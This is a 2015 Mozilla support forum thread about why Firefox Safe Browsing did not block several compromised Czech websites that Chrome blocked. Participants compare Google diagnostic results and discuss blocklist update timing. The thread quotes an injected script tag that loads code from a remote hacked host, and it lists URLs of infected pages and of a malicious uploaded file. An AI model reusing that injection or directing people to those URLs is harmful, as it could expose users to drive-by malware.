FF's Safebrowsing doesn't block malicious sites, Chrome's does.
Here are examples of sites that Google Safebrowsing diagnostics tags as malicious. Chrome Safebrowsings implementation blocks them all. However, Firefox Safebrowsing blocks none of them, it never popups when I access the sites, and I'm not protected.
Examples: 1. malicious site: http://hubka.cz/20061105/2006-10-29_Kounov_slunicko (connects to send29931.cn) Firefox don't block, Chrome blocks, Safebrowsing tags as malicious ( https://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhubka.cz%2F20061105%2F2006-10-29_Kounov_slunicko )
2. malicious site: http://www.koupelnysykora.cz/kontakt.php (contains malicious <script>) Firefox don't block, Chrome blocks, Safebrowsing tags as malicious ( https://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fwww.koupelnysykora.cz%2Fkontakt.php )
3. malicious site: http://masazerumburk.cz/tejpovani.html (connects to other malicious site) Firefox don't block, Chrome blocks, Safebrowsing tags as malicious ( https://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fmasazerumburk.cz%2Ftejpovani.html )
For most sites FF's Safebrowsing works well.
Is FF using official Safebrowsing service at https://code.google.com/p/google-safe-browsing/wiki/SafeBrowsingDesign ?
Could there be an error in FF's implementation of Safebrowsing service, or in Safebrowsing service itself?
FF 38.0 / Ubuntu 14.04, all updated. Thanks for all ideas,
E2rd
Asịsa ahọpụtara
Regarding timing issues: Firefox downloads lists from SafeBrowsing at various intervals so it can check URLs locally. Firefox does not query in real time to avoid leaking your browsing history to Google.
Gụọ azịza a na nghọta 👍 1All Replies (7)
Not sure I am seeing anything unexpected
- http://send29931.cn/ Is blocked as an attack site
-
Safe Browsing
Diagnostic page for www.koupelnysykora.cz
What is the current listing status for www.koupelnysykora.cz?
This site is not currently listed as suspicious. -
Safe Browsing
Diagnostic page for masazerumburk.cz
What is the current listing status for masazerumburk.cz?
This site is not currently listed as suspicious.
Just a guess but possibly due to Firefox piggybacking on Google's service and needing to update from Google their own browser has the information first.
This is our help article
- How does built-in Phishing and Malware Protection work?
- Also check you do have it enabled see How to stop Firefox from making automatic connections_anti-phishing-list-updating (You may have to scroll and expand headings.)
Thanks for your reply and for the links.
add 2) Really, Sykora is not blocked by Chrome anymore (it has changed from afternoon). But the malicious code is still present (2_sykora screenshot) and sometimes, it connects to malicious page on suncenter.org (1_sykora screenshot). And Google diagnostics DO accuse the site from hosting malware (3_sykora screenshot https://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fwww.koupelnysykora.cz%2Fkontakt.php ) - "The last time Google visited this site was on 2015-05-29, and the last time suspicious content was found on this site was on 2015-05-29."
add 3) The same for the masazerumburk site. It is still diagnosed as hosting malware, still blocked by Chrome (4_chrome screenshot) a not blocked by FF (5_masaze screenshot). The malicious injected code is in the beginning of the body tag: Rumburk</div><script type="text/javascript" src="http://www.hagen-kuenz.at/3dgtzjc9.php?id=465505"></script>
add piggybacking) I suspect it will not be updated. There are sites that are malicious as not having malware since few days, but FF still doesn't block them. Let's wait till Monday, I'll recheck if the infection is still present and if these sites are blocked by FF and let you know. If not, there may be an error in the Google's service that Firefox uses.
This may not be the best place for reporting these problems, but at least we can try to figure out whether to report this elsewhere.
- suncenter.org What issues are you seeing ?
One image https://support.cdn.mozilla.net/media/uploads/images/thumbnails/2015-05-29-10-57-23-cde37f.png highlights suncenter.org but when I try to check with google by using an edited link it is - www.koupelnysykora.cz To me it appears correct to not block this
The bottom line or in fact topline of the google report is that it is safe.
The report does include " last time suspicious content was found on this site was on 2015-05-29. " but maybe the site was infected and is now cleaned up so no problem with Firefox not blocking it. - masazerumburk.cz All I actually see is
<h2>Doména k prodeji, v případě zájmu kontaktujte: +420 608 776 799<h2>- Is also reported safe by Google https://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fwww.masazerumburk.cz
- http://masazerumburk.cz/tejpovani.html
- Again reported safe https://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fwww.masazerumburk.cz/tejpovani.html
- However I confirm I do see in the source code
<span style="color:#b25801">Rumburk</span></div><!--41a50d--><script type="text/javascript" src="http://www.hagen-kuenz.at/3dgtzjc9.php?id=465505"></script><!--/41a50d--> - And http://www.hagen-kuenz.at is blocked by Firefox as an attack site
- However I confirm I do see in the source code
By the way did you try the test pages ? and do they work ?
- Phishing http://itisatrap.org/firefox/its-a-trap.html
- Attack http://itisatrap.org/firefox/its-an-attack.html
IIRC they moved the test sites off mozilla so as not to damage mozilla's reputation and rating.
Asịsa Ahọpụtara
Regarding timing issues: Firefox downloads lists from SafeBrowsing at various intervals so it can check URLs locally. Firefox does not query in real time to avoid leaking your browsing history to Google.
Hi all, The strange behaviour of Firefox is the fault of Google Safebrowsing.
> did you try the [IIRC] test pages ? and do they work ? Yes, I tried them now in Firefox both. They work, red splash screen popups. As I said before, for most sites FF's Safebrowsing works well. However, there are site which should be blocked (and are tagged as malicious in Google Safebrowsing) but they are not. The purpose of this thread is to ask if FF using official Safebrowsing service at https://code.google.com/p/google-safe-browsing/wiki/SafeBrowsingDesign . If so, I suspect there are bug in this service, and I'll try to report it to Google itself somehow.
> This may not be the best place for reporting these problems, but at least we can try to figure out whether to report this elsewhere. Have you got any idea where it should be reported? Thanks!
Koupelny sykora > suncenter.org What issues are you seeing ? This site has been hacked. Hacker has uploaded malicious file: http://www.suncenter.org/emails/C2r9TXFy.php If you access the URL, you'll be redirected to localhost. However, Google has not yet found the infection, so the diagnostics page is alright. Google diagnostics don't know about the corrupted page.
> www.koupelnysykora.cz To me it appears correct to not block this site > "last time suspicious content was found on this site was on 2015-05-29. " It was on Friday. Now, it says: "The last time Google visited this site was on 2015-06-01, and the last time suspicious content was found on this site was on 2015-06-01." But you are right. The Google says that it is safe and Chrome blocks it no more. (It is a pity because hacker still has got the access to the file uploaded at suncenter. The malicious file is still there, so the site has not been cleaned.) It is very strange behaviour of Google Safebrowsing diagnostics that it says malware is still there but the site is not to be blocked. However, this it not the problem of Mozilla.
masazerumburk
You are checking wrong page. There is difference between "www" and not "www" and between masazerumburk.cz/tejpovani.html (infected) and masazerumburk.cz (not infected).
Google diagnostics for all the combination. www.masazerumburk.cz/tejpovani.html - not suspicious, not hosting malware, blocked by Chrome www.masazerumburk.cz - not suspicious, not hosting malware, not blocked by Chrome masazerumburk.cz/tejpovani.html - not suspicious, do hosting malware, blocked by Chrome masazerumburk.cz - not suspicious, do hosting malware, not blocked by Chrome
Strange behaviour, Chrome blocks something else than Google diagnostics recommends.
I see Google Safebrowsing service is little bit fuzzy for some sites. It says they are not suspicious, however, they host malware and they should be blocked by FF (as they are blocked by Chrome). Nevertheless, I understand FF can't know they are to be blocked when Google Safebrowsing do not tell.
Is there any way to change the Firefox update frequency for the Anti-Phishing & Anti-Malware blocklists, since the current frequency doesn't seem to be as effective as Chrome's implementation? If not, is there a way to force an update via the command line so I can schedule it manually? Also about how large are the update files?
Virvilis, N., Mylonas, A., Tsalis, N., & Gritzalis, D. (2015). Security busters: Web browser security vs. rogue sites. Computers & Security, 52, 90-105. doi:10.1016/j.cose.2015.04.009. Retrieved from http://www.cis.aueb.gr/Publications/C%26S-Insecure-Browsing.pdf
Hi BubbleHead, on Windows, you can see the actual files in the "temporary" profile folder here:
type or paste
%LOCALAPPDATA%\Mozilla\Firefox\Profiles
in the Start menu search box and press Enter
then double-click into your currently active profile and into the safebrowsing folder.
I don't know whether you can change the frequency of download.
(The research paper tested Firefox 29; download reputation was added in Firefox 31. That only affects the later part of the testing.)